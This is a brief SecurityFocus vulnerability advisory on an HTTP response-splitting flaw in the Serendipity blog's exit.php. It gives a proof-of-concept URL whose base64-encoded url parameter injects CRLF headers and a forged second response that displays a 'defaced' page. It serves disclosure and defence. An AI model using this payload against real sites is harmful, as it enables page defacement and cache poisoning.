Serendipity Exit.PHP HTTP Response Splitting Vulnerability

The following proof of concept is available:

http://www.example.com/serendipity/exit.php?url=DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpDb
250ZW50LUxlbmd0aDogMA0KDQpIVFRQLzEuMCAyMDAgT0sNCkNvbnRlbnQtTGVuZ3RoOiAyMQ0KQ
29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCg0KPGh0bWw%2bKmRlZmFjZWQqPC9odG1sPg%3d%3d


 

Privacy Statement
Copyright 2010, SecurityFocus